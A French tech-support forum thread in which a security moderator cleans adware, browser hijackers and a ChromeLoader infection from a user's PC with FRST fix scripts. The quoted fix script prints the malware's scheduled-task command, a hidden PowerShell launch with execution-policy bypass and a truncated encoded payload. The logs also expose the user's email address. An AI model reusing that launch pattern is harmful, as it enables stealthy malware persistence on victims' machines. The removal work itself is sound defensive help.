Powershell s’ouvre tout seul

Résolu/Fermé

Natcgn - 12 janv. 2022 à 20:48
bazfile Messages postés 57920 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 avril 2025 - 12 janv. 2022 à 22:46

Bonjour,
Quand je suis sur mon pc powershell s’ouvre tout seul toutes les 5 minutes ce qui m’embête . Je pense que c’est un virus . Quelqu’un pourrait m’aider ?

Merci

Configuration: iPhone / Safari 15.2

A voir également:

Windows powershell s'ouvre tout seul
Clé windows 10 gratuit - Guide
Montage video windows - Guide
Windows ne démarre pas - Guide
Winrar 64 bits windows 10 - Télécharger - Compression & Décompression
Restauration systeme windows 10 - Guide

6 réponses

Réponse 1 / 6

bazfile Messages postés 57920 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 avril 2025 19 619
12 janv. 2022 à 20:54

Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

Clique sur Analyser

Attention de bien attendre que les messages disant que l'analyse est terminée s'affichent

À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition, .
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.

Réponse 2 / 6

Nat
Modifié le 12 janv. 2022 à 21:05

FRST:https://www.cjoint.com/c/LAmt7AvzlPb
addition:https://www.cjoint.com/c/LAmubhBP5Rb

Nat
12 janv. 2022 à 21:17

Tu as pu trouver l'erreur ?

bazfile Messages postés 57920 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 avril 2025 19 619
Modifié le 12 janv. 2022 à 21:49

Le rapport "Addition" est incomplet.

Ton pc est très infecté, il va falloir être plus prudente et éviter de cliquer à tout va.

Tu as le navigateur Yandex est-ce toi qui l'a installé ?

Procédure à faire dans l'ordre indiqué :

En premier désinstalle les logiciels suivants avec RevoUninstaller en mode scan avancé :

- CleanMyPC
- Segurazo Realtime Protection Lite
- SSOption 
- Wondershare Helper Compact

Tutoriel Revo Uninstaller à lire attentivement.

Accepter la désinstallation du programme que l'on souhaite désinstaller et si il y a un message d'erreur disant que la désinstallation est impossible fermer le message d'erreur et continuer la procédure.

Cocher "Scan avancé" puis cliquer sur "Scan".

Cliquer sur "Sélectionner tout" puis sur "Supprimer" si une deuxième liste apparaît faire de même puis une fois que tout est supprimé cliquer sur "Fini" un redémarrage sera peut-être demandé.

Désinfection.

1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

Start::
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction ?
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction 
HKLM\SOFTWARE\Policies\Google: Restriction 
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
Task: {1C4A1181-1E34-490E-A191-39D3E6AA0FB2} - System32\Tasks\Opera scheduled Autoupdate 1588591720 => C:\Users\alexc\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {2CCBA2E7-941D-4323-B415-272D7501A228} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-alexcognon@yahoo.fr => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe -mode=scheduled (Pas de fichier)Task: {2CCBA2E7-941D-4323-B415-272D7501A228} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-alexcognon@yahoo.fr => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe -mode=scheduled (Pas de fichier)
Task: {7E11B7E3-6BA9-4753-B443-CB4AC970CEFC} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate (Pas de fichier)
Task: {99423343-A9BE-485F-8348-8E1B4DC190C2} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). 
Edge HomeButtonPage: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> hxxps://www.yandex.ru/?win=463&clid=2341035-18
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
Edge DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/yhs/search?hspart=ner&hsimp=yhs-001&type=aee_84d015defd161c9282¶m1=ArFaIWJoNqArQGMVADwgQGR7B7NoN9InxrFbMmYsQGMVw7ofB6poNqAqAXFaIWQBvmE4ICILNopcGWUIvmFdICIVNVI4ISoVNVE4J6k4NVQ3vqYXNVBdJ6IWwVM3vCILNVJdESk8NUM9Jmk3vmk3vCILNFdbDSk8vFE9ImoVvFQ9ImIVwVA3vCoXwV5cGWUWvmFcJmoUNEA3vCILNFdcIaUXNEBcGqQANFdcFCk8NoM9JGYXwVM3vGYXvmo9ISoUwVw9JGYYvFJdISISNVJdJGYTvFI9I6IYwVVdJ6IVwVw4JaYVvmpdJCIVwVI9JaYUwVM9ISIVvFRbFCILNF9cIqUXNolcEqULNopcGWUIvmFbF6IYwVVcG6IXvFM4ICoWwVQ9I6k4vmpcFCIVwVw4IGUJvFI9J6ISNEM4JmoWwVM9I6k3wVNcFSIYwVQ3vmoVNEY4JaUIwVQ4JaQIwV5dJGYNvmE4ICILNFRbDqUDNEJcFaULvmE9GqUINolcJqUJNEQ3wCIWvFI4JmoVwVI4ISk4wVU4ISIWQGR7B6RoN9J8LWZ6MWZcMWZoNqAsQGMVvDIlC6MuNGouNasuwCYpC7EmyCYbxU1dNU1dNXFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJpseyDF%3D¶m2=MGN9NqF6Matb&p={searchTerms}
Edge DefaultSearchKeyword: Default -> search by yahoo
FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> hxxps://www.yandex.ru/?win=463&clid=2341035-18
FF SearchPlugin: C:\Users\alexc\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\searchplugins\yandex.ru-20202315.xml [2020-11-15]
CHR Notifications: Default -> hxxps://app.slack.com; hxxps://aternos.org; hxxps://download-alert.com; hxxps://maviedechat.net; hxxps://p4.maranhesduve.club; hxxps://padlet.com; hxxps://personal-video.live; hxxps://qbqra.mybuzz.fun; hxxps://tvplusnewtab.com; hxxps://userscloud.com; hxxps://www.marmiton.org; hxxps://www.serials.ws; hxxps://www1a.debrahinton.pro; hxxps://www1a.ramirocampos.pro; hxxps://www51.zippyshare.com
CHR HomePage: Default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wnf_secureddownload_16_48_ssg02¶m1=1¶m2=f%3D1%26b%3Dchmm%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtBtCyD0CyDyD0BtDtD0FtC0B0CyEtN0D0Tzu0StCyBzyyEtN1L2XzutAtFtByDtFtCtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0B0D0BtByC0EzztGyDtD0CzytG0CzyzztCtGtD0D0AyCtG0B0A0DtBtByBtB0AtAtDtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0AyCzy0BtD0FyBtGtCtD0BtDtGyEtD0AyBtGzz0ByC0AtGtC0FtAtAzzyCtDtByBtA0AyB2QtN0A0LzuyE%26cr%3D1050113949%26a%3Dwnf_secureddownload_16_48_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
CHR HKLM\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
CHR HKLM\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno]
CHR HKU\S-1-5-21-1722835910-503718021-2123007925-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
CHR HKLM-x32\...\Chrome\Extension: [bhoagceacaklimpcejjofabngcjkebfg]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]
CHR HKLM-x32\...\Chrome\Extension: [nccfgpamboionigdpfjmijhlgmgdbael]
CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf]
2022-01-08 22:22 - 2022-01-08 22:22 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
2022-01-08 15:58 - 2022-01-08 15:58 - 000108784 _____ C:\Users\alexc\AppData\Roaming\whw.exe
2022-01-08 15:58 - 2022-01-08 15:58 - 000012288 _____ C:\Users\alexc\AppData\Roaming\e3dwefw.exe
S2 InnocentKalaga; C:\Program Files (x86)\InnocentKalaga\InnocentKalaga.exe [5948912 2018-04-05] (Apps Delivered Ltd -> Innocent Kalaga) [Fichier non signé]
YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png
YAN Extension: (Я.Почта) - C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15]
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1722835910-503718021-2123007925-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yandex.ru/?win=463&clid=2341035-18
SearchScopes: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> DefaultScope b5eaa8b0-276f-11eb-bd76-e0d55e69b8bf URL = hxxps://yandex.ru/search/?win=463&clid=2341036-18&text={searchTerms}
SearchScopes: HKU\S-1-5-21-1722835910-503718021-2123007925-1001 -> b5eaa8b0-276f-11eb-bd76-e0d55e69b8bf URL = hxxps://yandex.ru/search/?win=463&clid=2341036-18&text={searchTerms}
cmd: netsh advfirewall reset
Hosts:
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

IMPORTANT une fois ton ordinateur redémarré :

4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.

IMPORTANT :

5- Réinitialise Google Chrome avec CE LOGICIEL.
Puis :

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT

POUR INFORMATION:

Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps, si tu as un pc portable branche-le au secteur, car ce serait dommage de tomber en panne de batterie avant que la mise à jour ne soit terminée.

Réponse 3 / 6

Nat
12 janv. 2022 à 21:52

Ok merci je vais le faire et non ce n'est pas moi qui ai installé le navigateur.

bazfile Messages postés 57920 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 avril 2025 19 619
Modifié le 12 janv. 2022 à 22:23

Dans ce cas une fois la procédure précédente précédente terminée, pour supprimer Yandex fait une nouvelle correction FRST avec ce script :

Start::
CreateRestorePoint:
CloseProcesses:
C:\Users\alexc\AppData\Local\Yandex
YAN Profile: C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default [2020-11-15]
YAN DefaultSearchURL: Default -> hxxps://browser-resources.s3.yandex.net/old/get/browser/launcher_images/windows/yandex/pochta_win.targetsize-256.png
YAN Extension: (Я.Почта) - C:\Users\alexc\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\bcadigmkecmhhknameopgaidphameinh [2020-11-15]
End::

Réponse 4 / 6

Natcgn
Modifié le 12 janv. 2022 à 22:26

Ok et est ce que c’est normal que là correction prend du temps ?

Natcgn
12 janv. 2022 à 22:26

Non enfaite c’est bon ça vient de se terminer

Nat
Modifié le 12 janv. 2022 à 22:32

Voici le lien fixlog:
https://www.cjoint.com/c/LAmvC1SaIeb

bazfile Messages postés 57920 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 avril 2025 19 619 > Nat
Modifié le 12 janv. 2022 à 22:36

Le fixlog est bon, donne le lien du deuxième fixlog pour la suppression de Yandex voir mon précédent message..

Natcgn > bazfile Messages postés 57920 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 avril 2025
12 janv. 2022 à 22:35

Ok attends 2 minutes

Réponse 6 / 6

Natcgn
12 janv. 2022 à 22:42

Oui pour l'instant le bug n'est plus présent . Merci.
Je vais maintenant installer la derniere version de windows 10;

bazfile Messages postés 57920 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 29 avril 2025 19 619
12 janv. 2022 à 22:46

OK, l'infection étant supprimée je met le sujet en résolu.
Tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.

Discussions similaires

Powershell se lance tout seul

fenêtre powershell s'ouvre et se ferme régulièrement

Invite de commande s'ouvre et se ferme seul

Invite de commande qui s'ouvre tout seul

Problème lié à Windows PowerShell

Windows PowerShell